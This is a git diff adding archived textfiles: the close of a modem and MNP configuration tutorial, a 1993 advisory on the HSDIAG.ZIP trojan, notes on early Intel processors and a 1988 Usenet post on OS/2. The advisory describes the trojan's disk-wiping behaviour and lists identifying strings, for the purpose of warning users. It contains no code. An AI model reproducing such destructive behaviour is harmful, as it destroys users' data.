one full byte at a time (all bits together), +along with some control information. + +Your serial adapter converts the data from parallel to serial representation. +In other words, the bits that form the byte (which entered your adapter at the +computer side together) leave it at the connector side one after the other. +The adapter is asynchronous, which means that it adds a "Start" bit, "Stop" +bit(s) and perhaps a parity bit to each sequence of bits that form a byte (I +will not discuss this any further). + +Your Serial adapter narrows the eight-bits-per-byte-plus-control computer data +to a fewer number of lines, but is still creates digital data, which can be +transmitted over special (and short) lines only. This is why your adapter is +connected to a modem. The modem translates the digital data to voices that can +be transmitted over a standard telephone line. + +On the other side of the phone line, my modem listens to the incoming voices, +translates them to serial bits and feeds the bits into my serial adapter. This +adapter converts the sequence of bits into parallel bytes, which are read by +my computer. + +To summarize: + +- Your computer creates parallel bytes; +- Your serial adapter receives parallel bytes and creates serial bits; +- Your modem receives serial bits and creates voices; +- My modem receives voices and creates serial bits; +- My serial adapter receives serial bits and creates parallel bytes; +- My computer receives parallel bytes. + +(By the way, "internal" modems - such as the Everex EV-941 - combine the +serial adapter and the modem into a single card: they receive parallel data +and send voices, and vice versa. This is transparent to the software, since +the single-card modem emulates a serial adapter connected to an external +modem, and there is no difference on either the computer or the telephone line +side). + + +======================= +SOME MORE MODEM DETAILS +======================= + +Let's get closer and examine some points in higher detail. + +Your serial adapter is "Full Duplex", and so is probably your modem. This +means that they can receive and transmit data at the same time (the serial +adapter actually has two physical lines - one for outgoing bits, one for +incoming - as well as some control lines; the modem usually uses two basic +frequencies, one for transmitting and one for receiving). + +Your software, serial adapter and modem must be able to tell when each of them +is ready to communicate. In other words, there must be a standard method of +"Handshaking" between all parties. This is done in several methods. + +First, there are several control lines between the serial adapter and the +modem (these lines can also be set and/or sensed by the software on the +computer side of the serial adapter). Of these control lines I will mention +four: + +- DSR (Data Set Ready) - Modem-to-computer: Used by the modem to tell the + serial adapter and the computer that the modem is ready (but not + necessarily able to receive new data). + +- CTS (Clear To Send) - Modem-to-computer: Used by the modem to tell the + serial adapter and the computer that the modem is able to receive new + data. + +- DTR (Data Terminal Ready) - Computer-to-modem: Used by the serial + adapter to tell the modem that the adapter (and computer) is ready (but + not necessarily able to receive new data). + +- RTS (Request To Send) - Computer-to-modem: Used by the serial adapter + to tell the modem that the adapter (and computer) is able to receive new + data. + +Not all four lines are used by all modems, but MNP modems usually use all +four, as I'll explain later. + +There is an alternate way of handshaking between the communicating parties. +Instead of relying on extra hardware lines, this method uses special ASCII +values that are sent as standard data but have a unique meaning. These values +are usually XON (hex 11), which means "start", and XOFF (hex 13), which means +"stop". Using XON/XOFF has several disadvantages: it slows down the +transmission (because handshaking comes in sequence rather than in parallel +with the data), and more important - the XON/XOFF characters, being used for +handshaking, are "swallowed" and cannot be transmitted as part of the normal +data. + +One more thing you should know about modems is that they usually work in two +modes. In normal mode, everything you send to the modem is transmitted over +the phone to the other partner. The modem may also operate in "Command" mode; +in this case, the data you send to the modem is interpreted as modem commands +(the switch between normal and command mode will not be explained here, since +it is usually done for you by your communication program). Most modems use the +Hayes command language, in which all commands start with the characters "AT". +The Hayes language is not uniform - every manufacturer has its own implement- +ation of the language, particularly for such exotic things as MNP control, +which is what this document is all about. I cannot therefore give exact rules +that match all modems, and you will have to figure out your own commands if +your modem is different than mine. + + +==================== +COMMUNICATION SPEEDS +==================== + +I said "communication speeds" and not "communication speed" on purpose. Each +modem has a rated maximum speed. This is somewhat misleading, because there +are several speeds involved, and the final communication speed depends on +more than one factor. + +The modem speed itself is measured in Bits Per Second, or BPS. This is the +number of bits per second sent or received by the modem over the telephone +line. The most common speed today is 2400 BPS (1200 is used by older or +cheaper modems, while 9600 is becoming quite common). + +(You may also hear the term "modem Baud rate". IGNORE IT. This measures the +number of modem status changes per second. 2400 BPS modems have usually a +Baud rate of only 600, and use special techniques such as frequency shifting +to squeeze in more bits per change in status). + +The modem speed (BPS) refers to the PHONE side of the modem. The speed on the +other side, between the modem and the computer, is not necessarily the same. +MNP modems are usually capable of talking to the computer faster than they +talk between themselves; we'll soon see why this is necessary. + +When the modem-to-computer and modem-to-modem speeds are different, some +handshaking techniques (explained above) must be used to ensure that the +computer does not "overrun" the modem beyond its actual capabilities and vice +versa. + +To complicate things a little more, the BPS speed measures the actual number +of bits that flow between modems. MNP effective transfer rate can be faster, +because less bits are needed to transmit the same amount of data. + +There is one thing you must remember. THE ACTUAL TRANSMISSION SPEED IS THE +SPEED OF THE SLOWEST COMMUNICATING PARTNER. If your modem can talk 2400 and +my can talk 1200, the actual speed will be 1200: this is straightforward. What +is less obvious is that if your modem can talk to my modem at an effective +speed of 3000 (actually 2400 enhanced by MNP) but your (or my) computer-to- +modem speed is fixed at 2400, the final speed will only be 2400 - and neither +of us may be aware of it. + +Communication is a two-partners game. You may set all your speeds correctly +on your side, but this is not good enough. I must set my speeds right as well. +SYSOPS PAY ATTENTION: There is a whole world out there waiting for you to +setup your communication parameters correctly! + + +=============== +SOME MNP BASICS +=============== + +MNP, or Microcom Networking Protocol (today supported by many more brands +beside Microcom), was originally intended to ensure error-free communication +between modems regardless of phone line conditions. MNP is divided into +classes. In the first (and earliest) classes, the error-free communication was +obtained at a price of reducing the effective speed (which is quite obvious +if you think about it). Newer classes use special techniques that result in +error-free data transfer while actually INCREASING the communication speed +(moderately to considerably). + +MNP classes 1 and 2 reduce the transfer speed, and are not worth discussing. + +MNP class 3 is the first class that resulted in an increased transfer rate. +This was done by communicating between the modems using SYNCHRONOUS "packets" +without start and stop bits, although the data transfer on the other side of +the modems (between the modems and the computer) is still synchronous. There +is still some overhead involved, so the effective transfer rate of MNP 3 is +about 108%, or up to 260 bytes per second for an 2400 BPS modem, compared to +240 bytes for non-MNP (assuming 1 start bit, 1 stop bit and no parity). These +speeds, by the way, are ideal and are never reached because of other limiting +factors, but you can get quite close. + +MNP class 4 uses synchronous packets as well, and optimizes these packets by +eliminating unnecessary data and adjusting to line conditions. The effective +transfer rate of MNP 4 is up to 120%, or about 260 bytes per second for 2400 +(assuming there are not too many errors - remember that the communication is +supposed to be error-free as well as faster). + +MNP class 5 adds data compression to MNP 4. A real-time adaptive compression +algorithm is used, which means that the modem adjust the algorithm all the +time to match the data being transferred. Unlike the previous classes, which +provide a constant speed factor, compression depends of course on the data +being transmitted. MNP 5 is considered to have an effective rate of 200%, +which makes a 2400 BPS modem behave like a 4800. + +There is a catch, however. If your modem does mainly file transfers from a +BBS, chances are that you will not gain much by compression (to put it in +other words, if the already-compressed .ZIP or .ICE etc. files in the BBS can +be squeezed any further, the file compression method should probably be +changed!). Some publication suggest that you would be better off WITHOUT data +compression in this case, since compression does have its price, which means +that you should revoke MNP 5 and go back to using MNP 4. My own experience is +that MNP 5 does not harm file transfers that much, and you should probably +keep it on to take care of interactive BBS work, but your case might be +different - feel free to experiment and let me know the results. + +This is as far as I will go. There are several further MNP classes (the latest +one I heard of is MNP 10, which makes a 2400 BPS modem behave like 19200!), +but the idea is the same, and modems above MNP 5 are still not that common. + +One thing I didn't say, but should be obvious, is that MNP is a two-way +business - both communicating modems must use the same MNP level when they +communicate (the modems may negotiate and agree upon a certain level when they +make the first connection). + + +==================================== +HOW TO SPEED THINGS UP - BASIC IDEAS +==================================== + +Enough with the theory - let's start doing something useful. + +The things you should do to make your communication faster can be summarized +as follows: + +1. PURCHASE AN MNP MODEM (at least MNP 4, probably 5). + +2. PURCHASE A FAST-ENOUGH COMMUNICATION PROGRAM, that will not cause a + bottleneck on your computer (notice that I said "purchase", not "steal" + or "borrow"!). + +3. MAKE YOUR MODEM USE MNP (4 or 5 - as I said, I don't have a good advise + here). This is rather easy, but remember that most MNP modems do NOT use + MNP as a default, so you have to do some manual work. + +4. MAKE YOUR SERIAL ADAPTER TALK TO THE MODEM AT A HIGHER RATE THAN THE + MODEM'S NOMINAL RATE. The manuals suggest 4800 for a 2400 modem; I + myself am more optimistic and use 9600. + +5. MAKE SURE YOUR MODEM STAYS AT THE HIGH MODEM-TO-ADAPTER SPEED and does + not revert to the modem-to-modem nominal speed when the connection is + made. + +6. MAKE SURE YOUR COMMUNICATION PROGRAM STAYS AT THE HIGH SPEED and does + not revert to the modem nominal speed when the connection is made. + +7. USE HARDWARE-LEVEL HANDSHAKING (CTS/RTS) between the modem and your + communication program. Do NOT use XON/XOFF handshaking. + +This is all you have to do, but you must make sure you do EVERYTHING specified +here. If you do a partial job, you'll end up without any gain in speed (the +better case) or with unreadable garbage on your screen (the worse case). + + +============================================ +HOW TO SPEED THINGS UP - A PRACTICAL EXAMPLE +============================================ + +For the hardware part, let me assume that you have purchased an Everex EV941 +modem with MNP 5 (this is NOT a recommendation - there may be better bargains +in the market). I'll also discuss some other modem setup possibilities. + +For the software part, you may use the communication program that comes +bundled with your modem (Everex comes with something called "BitCom"), but +there ARE much better bargains in the market, and some of them are shareware, +so you can experiment and purchase the one you like. I'll mention two: + +- Telix seems like a fairly good choice. It is FAST, not too large, has + built-in ZMODEM and a powerful script language, and is not too annoying + to use. + +- Telemate is considered to be a good choice, since it allows a kind of + multitasking (you can browse a file while you download so you can decide + on-the-fly what to download next). If your computer is slow, Telemate + may not be fast enough and may become a bottleneck (something a + communication software should never be), and it also eats up too much + of your precious RAM, but it is still worth considering. + +I have also experimented with some other packages (including Procomm, Procomm +Plus which is used at my work but is NOT shareware, Boyan, Qmodem and GT1500). +Most of them can be used quite easily with MNP. + +A communication program is not complete without some external file transfer +protocols. There are about a dozen of them around, but I'll discuss only +three: Puma, which is fast and elegant; Bimodem, which is quite amazing (it +is truly full-duplex - allows you to upload and download simultaneously at +full speed, and even chat with your friend at the same time); and DSZ, which +contains several protocols including ZMODEM and is preferred by many users. + + +=========== +MODEM SETUP +=========== + +In the following lines I'll discuss only those modem settings that are +important for proper MNP operation. There are more options that I will not +mention. + +Commands that have an alphabetic character immediately following the AT code +are usually common among all modems. Commands that start with AT& are less +common, and there are some variations. Commands that start with AT\, AT% or +AT* are unique, and probably have other codes in other modems. + +ATB1 (Mandatory, default). Selects the Bell 212A protocol. + +ATE1 (Mandatory, default). Echoes the commands to the screen; some + communication programs require it, for others it does no harm. + +ATQ0 (Mandatory, default). Suppresses "quiet" modes, and causes command + responses to be sent by the modem (most communication programs + require it to tell when a communication has been made, etc.). + +ATV1 (Recommended, default). Causes command responses to be displayed + in English words rather than in numeric codes. + +ATX4 (Recommended, default). Causes the modem to wait for dial tone + before dialing, and to detect BUSY and NO ANSWER conditions. some + modems may not support it. + +AT&C1 (Mandatory, default). Causes the modem to indicate Data Carrier + Detect (DCD) only when there is actually a modem on the other + side (DCD is not explained in this article). + +AT&D2 (Mandatory, default). Causes the modem to hang up when the DTR + line is down (DTR is explained above). + +AT&S1 (Mandatory, NOT default!). Causes the modem to keep the DSR line + up only when the modem is active (DSR is explained above). BE + CAREFUL: Other modems use AT&S for other things (Motorola 82240, + for example, uses it for front switch settings control). + +AT\C1 (Mandatory, NOT default!). Enables an internal modem buffer to be + used while the modems negotiate MNP. If not used, the first + characters in the transmission may be lost. + +AT\G0 (Mandatory, default). Disables XON/XOFF flow control between the + two modems. Setting AT\G1 will cause problems with some file + transfer protocols (such as Bimodem). + +AT\J0 (Mandatory, NOT default, VERY important!). Turns "baud adjust" + off. The default (AT\J1) causes your modem to adjust the speed by + which it communicates with your computer (the RS232 side) to the + nominal modem-to-modem speed at connect time, which eliminates all + MNP speed gains (your 2400 modem will talk "effective-4800" to the + second modem, but only 2400 to your computer!). Setting AT\J0 + keeps the speed between the modem and the serial port constant + (how to set this speed initially is explained below). Other modems + use other commands for this, such as AT&I1. + +AT\K5 (Mandatory, default). Causes a Break signal to be sent and + received in sequence with the data, which is important for file + transfers. Other modems use other commands for this, such as + AT*Y2. + +AT\N3 (Mandatory, NOT default!). Causes the modem to work in "auto- + reliable" mode, which means that it will try to use MNP and fall + back to non-MNP if the other modem is not compatible. The default + (AT\N1) DISABLES MNP altogether. Other modems use other commands + for this, such as AT&E4 or AT&E6. + +AT\Q3 (Mandatory, NOT default, VERY important!). Causes hardware-level + handshaking (RTS/CTS) between your modem and your computer. If the + modem and the serial adapter speeds are different (such as when + AT\J0 is specified), handshaking MUST be enabled. DO NOT use + XON/XOFF handshaking (AT\Q1), because it will cause problems with + some file transfer protocols. Other modems use other commands for + this, such as AT&K2. + +AT\V1 (Recommended, NOT default!). Causes the modem replies to indicate + if a reliable (MNP) connection has been made - you should probably + want to know what kind of connection you have established. + +AT\X1 (Mandatory, NOT default!). Enables XON/XOFF characters to be sent + to the other modem as data. The default (AT\X0) will swallow + XON/XOFF and will cause problems with some file transfer + protocols. + +AT%C1 (Up to you - I use it; NOT default). Enables data compression + (uses MNP 5 rather than MNP 4). If you can prove that MNP 5 slows + down file transfers considerably, I'll be glad (?) to switch back + to AT%C0. + +ATDT (Recommended). This has nothing to do with MNP, but you may be + able to use touch-tone (DTMF) dialing without being aware of it, + and it is a real time saver. Even if you can't, try to ask Bezeq - + you may be surprised. + +AT&W0 You probably do not want to type all those setup strings every + time, so save them once with AT&W0, and indicate to your + communication program that your modem initialization string is + simply ... + +ATZ Which is easy to remember and use. + +AT&V (View setting). Use this to check your non-MNP modem settings. + +ATI6 (Inquire modem). Use this to check your special MNP modem settings + (why use two different codes is beyond me). + + +=========== +TELIX SETUP +=========== + +If you are using Telix as your favorite communication program, there are +several things that you should do to make it work properly with MNP. + +First, bring up the Telix setup menu (Alt-O), and select "Terminal options". + +Within "Terminal options", select option A and set the default baud rate to +9600 (!) if your modem is 2400 MNP. This will ensure that the serial-adapter- +to-modem speed is high enough not to cause a bottleneck. + +Then select the appropriate options to turn XON/XOFF flow control OFF, CTS/RTS +flow control ON, and DSR/DTR flow control OFF. Do not use any other +combination of flow control! + +Now go back to the configuration menu and select "Modem and dialing". Set the +modem initialization string to ATZ^M (provided that you have saved your +setup!), and set Auto Baud detect to OFF. + +Finally, go to your dialing directory and define ALL entries to have a speed +of 9600 (even if you know for sure they are only 1200 or 2400). + +Now start working. You should notice that the speed indication in the status +line always says 9600, whether you are idle or communicating. If it is (and +if you manage to work), you probably did everything right. + +(What happens is that Telix talks to your modem at a constant speed of 9600 +BPS and uses CTS/RTS flow control to avoid overruns; your modem talks to the +other modem as fast as it can, taking advantage of MNP if available, and is +not delayed by your computer's hardware or software). + +There is one small problem. If you upload or download with Telix's internal +protocols, the estimated transfer time will be incorrect, because it will be +based on the assumption that your modem is actually 9600 BPS. This is a small +price to pay in order to be able to work faster. + + +============== +TELEMATE SETUP +============== + +First of all, use Telemate only if your computer is fast enough and has enough +free memory - writing programs in C using Vermont Views results in very good +programs but does not contribute to their size and performance. + +Go to Telemate's options menu (use your mouse or Alt-O). + +Select "Dial setup", and turn "Auto Baud detect" OFF. + +Select "Terminal", and turn XON/XOFF flow control OFF and RTS/CTS flow control +ON. + +Select "Communication", and set the modem initialization string to ATZ^M +(provided that you have saved your setup!). In addition, set the "Baud rate" +(which by now you know should say BPS, not Baud) to 9600 (!) if your modem is +2400 MNP. This will ensure that the serial-adapter-to-modem speed is high +enough not to cause a bottleneck. + +Do not forget to save your setup. + +Finally, switch to your dialing directory and define ALL entries to have a +speed of 9600 (even if you know for sure they are only 1200 or 2400). + +Now start working. If you left your status line on, you should notice that the +speed indication in the status line always indicates 9600, whether you are +idle or communicating. If it is (and if you manage to work), you probably did +everything right. + +Unlike Telix, Telemate adjusts its estimated upload/download times as it +works. Therefore, only the initial estimated transfer time will be incorrect +(because it will be based on the assumption that your modem is actually 9600 +BPS), but after a few blocks the estimate will be corrected. + + +========== +PUMA SETUP +========== + +If you are using Puma as an external protocol, you can have MNP speed AND a +correct estimate of the file transfer time. + +Run PUMASET to configure Puma, and choose "Change default options". In this +menu, select the following: + +- UART Baud - "current" (assuming you always call Puma when your + communication program is operating). + +- Effective Baud - 2400 (assuming your modem is 2400). This figure is used + for estimating the file transfer time. + +- CTS/RTS handshake - "fast". + + +============= +BIMODEM SETUP +============= + +Bimodem is a protocol you cannot live without if you plan on being a honest +person and upload at least once in a while. + +Like Puma, Bimodem can be configured to use MNP and estimate times correctly. + +To do this, run BICONFIG (either directly or from BIMENU). Select "Terminal +options" and set the following: + +- "Baud (yack!) rate to base estimate on" - type here your nominal modem + speed (e.g. 2400). This figure is used for estimating the file transfer + time. Note that if you use MNP, your effective BPS rate will be faster, + and the estimated time will be too long. + +- "CTS/RTS hardware flow control" - set to "Y". + +The next time you are asked why you always download and never upload, do not +use the "I don't have time" or "I don't have money" excuses - they do not work +well with Bimodem. + + +========= +DSZ SETUP +========= + +DSZ is a famous yet not-very-user-friendly file transfer package that supports +several protocols, most importantly ZMODEM. It is a must if you use a +communication program that does not have internal ZMODEM, and there are those +out there who use it even with Telix or Telemate, because DSZ is supposed to +be faster and better (you can try it and judge for yourself). + +The following comments are based on the DSZ version dated April 11, 1990 +(known as DSZ0411). They are probably relevant to other versions as well. + +DSZ is command-line oriented and does not have a separate setup mode. The DSZ +documentation has the courtesy of stating that it has a "handshake XX" +command-line option (which can be abbreviated to "ha"), but it does not +indicate what values this mysterious XX can take (this is part of the +package's user-friendliness). If you dig deep enough, you find that the value +relevant to MNP is "handshake cts". The DSZ command for ZMODEM downloading +should therefore look something like: + + DSZ ha cts rz -rr + +note that there is no hyphen before "ha", and that you must use lowercase +characters. + +DSX has another option that may be relevant, called "estimate". If you +indicate the effective BPS rate to DSZ (such as 2400 when using non-MNP or +2900 when using MNP), DSZ will show a correct estimated transfer time; +otherwise the estimate will be based on the RS232 speed (9600) and will be +incorrect. If your file transfer is long enough, you may have enough time to +locate where exactly on the screen DSZ gives its estimate - somewhere towards +the end of its numerous line-mode messages. + + +======================= +A FINAL WORD FOR SYSOPS +======================= + +As you have probably guessed by now, I am NOT a SYSOP and probably never will +be (I am too old, too busy and too poor). + +I therefore have no idea what to do on your side of the game to make MNP work. + +We users can do everything we can, but if you do not setup your end correctly, +we will never gain speed. + +If any of you out there knows what to do with all those Front Doors and Remote +Accesses an QBBSes and FileDoors and other Buzzwords to make them utilize MNP, +please share this information with other SYSOPs, so that you and us (who cares +about you and us? - me!) can save some time and money. + + +======================== +A FINAL WORD TO EVERYONE +======================== + +I don't want to have too many mistakes in this document. If you find one, or +if you want to add your own comments, please let me know. + +You spent some money on your equipment - I hope this will help you use it +cheeper and faster. + + \ No newline at end of file diff --git a/textfiles.com/computers/hsdiag.res b/textfiles.com/computers/hsdiag.res new file mode 100644 index 00000000..8a7a87ec --- /dev/null +++ b/textfiles.com/computers/hsdiag.res @@ -0,0 +1,146 @@ + ========================================================================= + || + From the files of The Hack Squad: || by Lee Jackson, Moderator, FidoNet + || Int'l Echos SHAREWRE & WARNINGS + The Hack Report || Volume 2, Number 5 + File Test Results || Result Report Date: April 10, 1993 + || + ========================================================================= + + ************************************************************************* + * * + * The following test was performed by R. Wallace Hale, sysop of the * + * Driftnet BBS, (506) 325-9002. The results, forwarded by * + * James FitzGibbon (FidoNet 1:250/301) and HW Bill Lambdin, are * + * preliminary. Thanks to everyone for their assistance. * + * * + ************************************************************************* + + + HSDIAG.ZIP WARNING!!! + ~~~~~~~~~~~~~~~~~~~~~ + +The file HSDIAG.ZIP, masquerading as a high speed modem diagnostic +utility is a Torjan horse. + +This is a PRELIMINARY report and will be expanded and/or modified +(and probably corrected) in due course. + +I received HSDIAG from Bob Feldman today, and have not had sufficient +time to disassemble HSDIAG.EXE completely, but I have done enough to +determine that the program will overwrite the first 255 sectors on the +first eight drives on a system! + +The Trojan begins with the highest number drive and works downward, +finishing with the floppy diskette in Drive A, if such exists. In +addition to data loss, the system will no longer be bootable from +the hard drive. + +Error messages are suppressed and once started, the Trojan can NOT +be halted by a Ctrl-C or Ctrl-Break key sequence. + +No virus scanner in my arsenal twigs to the Trojan, nor does +F-PROT 2.07 in heuristic mode find anything suspicious. This is +not at all surprising, and one shouldn't expect any virus scanner +to provide protection against Trojan programs. + +However, tired old PROGNOSE warns of possible danger. + +The following strings can be found in HSDIAG.EXE: + + 18C: High Speed Modem Diagnostics + 1B6: Version 1.0 + 1E0: Sound Blaster Support + 232: ) Written by Bully Bros, Incoporated) + Please Press [ENTER] To Load Diagnostics, + 287: Please wait .. + 296: ..Loading Done!#Press [ENTER] to Start Diagnostics. + 2CA: Bully Bros.Dallas TX. + 2E0: -Copyrite (C) 1993 Bully Bros. Raj And Asshole + DF0: #$456789:;<=>?uRuntime error + E0E: at + + +The Trojan archive contents are: + +Archive: HSDIAG.ZIP + +Name Length Method SF Size now Mod Date Time CRC +============ ======== ======== ==== ======== ========= ======== ======== +HSDIAG.EXE 4864 Deflated 34 3172 08 Mar 93 22:03:58 1C84FC4D +FILE_ID.DIZ 245 Deflated 7 228 17 Mar 93 02:02:50 7CF5CBD2 +HSDIAG1.DAT 17264 Deflated 36 11044 27 Nov 92 13:47:34 46B34F7D +HSDIAG2.DAT 7121 Deflated 57 3012 27 Nov 92 13:47:34 7127D2C7 +HELP.DAT 4064 Deflated 31 2802 27 Nov 92 13:47:34 6FD0DD60 +UART1.DAT 5872 Deflated 39 3542 27 Nov 92 13:47:34 AFB5E3CE +HSDIAG3.DAT 2848 Deflated 50 1404 27 Nov 92 13:47:34 0089171B +============ ======== ======== ==== ======== ========= ======== ======== +*total 7 42278 ZIP 2.0 38% 26706 10 Apr 93 11:23:42 + +All executables in the archive appear to have been written with +Borland's Turbo Pascal, version 4.0 or higher. Since I am not a +Pascal programmer, I can't really be certain on this point. + +I am absolutely certain that all of the .DAT files were taken from +Joseph Sheppard's ATSEND v.1.8 and have merely been renamed. The +contents of ATSEND18.ZIP are listed below, and I have done a +byte-by-byte comparison of the .DAT files from the hack with the +files in ATSEND18.ZIP to verify this. + +Archive: ATSEND18.ZIP + +Name Length Method SF Size now Mod Date Time CRC +============ ======== ======== ==== ======== ========= ======== ======== +ATSEND.EXE 17264 Imploded 33 11452 27 Nov 92 13:47:34 46B34F7D +ATSEND.DOC 7121 Imploded 55 3142 27 Nov 92 13:47:34 7127D2C7 +HEX2DEC.EXE 4064 Imploded 28 2899 27 Nov 92 13:47:34 6FD0DD60 +ATBATCH.EXE 5872 Imploded 37 3688 27 Nov 92 13:47:34 AFB5E3CE +FILE_ID.DIZ 332 Imploded 9 302 27 Nov 92 13:49:38 09F0E0D8 +ATSEND.NEW 2848 Imploded 44 1589 27 Nov 92 13:47:34 0089171B +============ ======== ======== ==== ======== ========= ======== ======== +*total 6 37501 ZIP 1.10 36% 23708 27 Nov 92 13:49:38 + + +I received HSDIAG in ZIP 2.0 format and have no idea whether the +author of the Trojan released it initially in an archive created +with PKZip 1.10 with a forged -AV or not. Mr. Sheppard uses the +AV feature of PKZip to provide some slight measure of security: + +PKUNZIP (R) FAST! Extract Utility Version 1.1 03-15-90 +Copr. 1989-1990 PKWARE Inc. All Rights Reserved. PKUNZIP/h for help +PKUNZIP Reg. U.S. Pat. and Tm. Off. + +Searching ZIP: ATSEND18.ZIP +Testing: ATSEND.EXE OK -AV +Testing: ATSEND.DOC OK -AV +Testing: HEX2DEC.EXE OK -AV +Testing: ATBATCH.EXE OK -AV +Testing: FILE_ID.DIZ OK -AV +Testing: ATSEND.NEW OK -AV + +Authentic files Verified! # CRI220 Joseph Sheppard + +The hacked archive, HSDIAG.ZIP contains a FILE_ID.DIZ file: + +°±² High Speed Modem Diagnostics ²±° +Superb tool for testing and configuring high +speed (9600bps and up) modems. Reports on +UART, FIFO, S-Registers, and full NVRAM +editor with context sensitve help. $35 +Written by: Norman Shelbert + +This is NOT the FILE_ID.DIZ from Sheppard's ATSEND18. +Don't know who Norman Shelbert may be, but possibly there +is a legitimate high speed modem diagnostic program +written by such a person, and the FILE_ID.DIZ may have +been lifted from that program. + +If at all possible, I will post further information +within the next day or two. + + +R. Wallace Hale, sysop +Driftnet (506) 325-9002 + +10 April 1993 + diff --git a/textfiles.com/computers/i4004.txt b/textfiles.com/computers/i4004.txt new file mode 100644 index 00000000..8377c4d2 --- /dev/null +++ b/textfiles.com/computers/i4004.txt @@ -0,0 +1,68 @@ +Section One: Before the Great Dark Cloud. + --------------------------- +Part I: The Intel 4004 (1972) + + The first single chip CPU was the Intel 4004, a 4-bit processor meant for +a calculator. It processed data in 4 bits, but its instructions were +8 bits long. Internally, it featured four 12 bit(?) registers which acted as +an internal evaluation stack. The Stack Pointer pointed to one of these +registers, not a memory location (only CALL and RET instructions operated on +the Stack Pointer). There were also sixteen 4-bit (or eight 8-bit) general +purpose registers + The 4004 had 46 instructions. Intel created an 8-bit version of this, the +8008 (intended for a terminal controller). +[for additional information, see Appendix B] + +Part II: The Intel 4040 and 8080 + + The 4040 was compatible with the 4004 instruction set - the 4040 had 60 +instructions, which included the 46 4004 instructions. The 8080 was similar to +the 4040, except being 8 bits wide. + The 8080 had a 16 bit address bus, and an 8 bit data bus. Internally it +had seven 8 bit registers (six which could also be combined as three 16 bit +registers), a 16 bit stack pointer (the stack was stored in memory, not in an +internal register set), and 16 bit program counter. It also had several I/O +ports - 256 of them, so I/O devices could be hooked up without taking away or +interfering with the addressing space. + +Appearing in IEEE Computer 1972: +------------------------------- + +NEW +PRODUCTS + +FEATURE PRODUCT + +COMPUTER ON A CHIP + + Intel has introduced an integrated CPU complete with +a 4-bit parallel adder, sixteen 4-bit registers, an accumula- +tor and a push-down stack on one chip. It's one of a +family of four new ICs which comprise the MCS-4 micro +computer system--the first system to bring the power and +flexibility of a dedicated general-purpose computer at low +cost in as few as two dual in-line packages. + MSC-4 systems provide complete computing and con- +trol functions for test systems, data terminals, billing +machines, measuring systems, numeric control systems +and process control systems. + The heart of any MSC-4 system is a Type 4004 CPU, +which incudes a set of 45 instructions. Adding one or +more Type 4001 ROMs for program storage and data +tables gives a fully functioning micro-programmed com- +puter. Add Type 4002 RAMs for read-write memory and +Type 4003 registers to expand the output ports. + Using no curcuitry other than ICs from this family of +four, a system with 4096 8-bit bytes of ROM storage and +5120 bits of RAM storage can be created. For rapid +turn-around or only a few systems, Intel's erasable and +re-programmable ROM, Type 1701, may be substituted +for the Type 4001 mask-programmed ROM. + MCS-4 systems interface easily with switches, key- +boards, displays, teletypewriters, printers, readers, A-D +converters and other popular peripherals. For further +information, circle the reader service card 87 or call Intel +at (408) 246-7501. + Circle 87 on Reader Service Card + + COMPUTER/JANUARY/FEBRUARY 1971/71 diff --git a/textfiles.com/computers/ibm.fu b/textfiles.com/computers/ibm.fu new file mode 100644 index 00000000..99fcfc7d --- /dev/null +++ b/textfiles.com/computers/ibm.fu @@ -0,0 +1,146 @@ +Article 6598 of comp.sys.ibm.pc: +Path: puukko!santra!tut!enea!mcvax!uunet!husc6!rutgers!gatech!ncar!ames!pacbell!pmt1!news +From: news@pmt1.UUCP (Usenet news) +Newsgroups: comp.sys.ibm.pc +Subject: Re: OS/2 Anyone? +Summary: Its still VAPORWARE +Message-ID: <427@pmt1.UUCP> +Date: 4 Jun 88 18:11:26 GMT +References: <1866@ncsuvx.ncsu.edu> +Organization: Pacific Micro Tech, El Cerrito, CA +Lines: 131 + +In article <1866@ncsuvx.ncsu.edu>, sam@ncsuvx.ncsu.edu (Whad Upp) writes: +> +> +> I just got back from the announcement of the Model 70 and Model 50Z PS/2s +> given by IBM. They told us that OS/2 was quickly becoming THE OS standard, etc. +> +> I have OS/2 running, but the only application I have is a port of MicroEmacs +> that I did myself. I have talked with a handfull of other people that are +> in about the same position as I am. +> +> Is anyone doing any OS/2 development? Are people waiting for the PM to be +> released? How about public domain software for OS/2? Is it out there in one +> place? +> +> I am willing to setup an FTPable library of public OS/2 software if there +> is a need. But is there? +> + + +The problem is much deeper that just waiting for presentations +manager. OS/2 is to support large corporate networks using +a new communications manager. The OS/2 applications on +individual workstations are to be connected by a +lan to communications manager. So many of OS/2s first +users will be IBMs largest customers. They buy PCs by +the thousands or tens of thousands. Consider the plight of +a major corporation trying to implement new applications and +networks under OS/2 and it is no wonder that things are going so +slowly. + +I have been doing consulting for a large fortune 500 company which +is known to be a large IBM account. They want to +deploy a huge network and a large number of workstations +using PS/2s and OS/2. And of course they want to +buy everything from Big Blue. The project has been slipping from day one, +and the major reason waiting for the new hardware and OS/2 EE. +For instance: + +We've been waiting for the new communications manager, the one +that is to allow us to consolidate our existing networks. + +OS/2 at this stage is not very useful, and we have to convert +existing applications to use it, or wait for other vendors to +do conversions. Many third party vendors are taking a wait +and see approach. We can't run existing applications in +the compatiblity box. We require host communications and +the compatibility box switches from real to protected mode +which disrupts communications. + +We're waiting for the lan manager so we can hook application +workstations to the network when it becomes available. + +We're waiting for presentation manager. But since all our existing +applications use other windowing software we don't know exactly where +windows (sorry, Presentation Manager) fits. It is unclear that +PM really has all of the tools to replace the application +specific window managers, such as adequate editing and forms handling +abilities. + +The IBM PS/2 model 50 and newly announced variants all seem too +expensive for many many thousands of application workstations. +Certainly far more expensive than clustering users on Unix +systems (say 3-4 user per machine) and hooking the multi-user +systems into the lan and network. + +If using OS/2 we would prefer diskless workstations +which can boot from a common file server. +While the model 25 is not right for us (does not run OS/2), the +model 50 is not diskless. True we read about experimental diskless +workstations but, IBM seems to be quiet about them. + +When (when ?) we get diskless PCs and are able to boot from a file +server, the token ring lan appears to be too slow for the +load at the current bandwidth. We hear about 16MB lan cards +of the future...but where are they? + +So we had another thought ... lets put our applications +under Dos and move them to OS/2 +later. This is an attempt to end the waiting game, so we +can work on our application backlog and keep our users +happy. One problem: the workstations we choose for DOS may not be +the correct configuration for OS/2 later on. It appeas that +as OS/2 comes nearer, the workstations are being revised +so they will be appropriate for the new operating system. +That is just what happened with UNIX in 1982, when the first +vendors told us it worked just fine without a hard disk, and +that it only needed 340K to work properly. New versions of +the existing Unix computers appeared within a year. + +The other problem with DOS is the 640K memory barrier. When +you load a PC with DOS and lan manager, you lose lots +of memory. Especially if you don't have a network gateway +and you also have to add 3270 software in the PC. Ram +disk is the obvious choice to ease our memory problems. 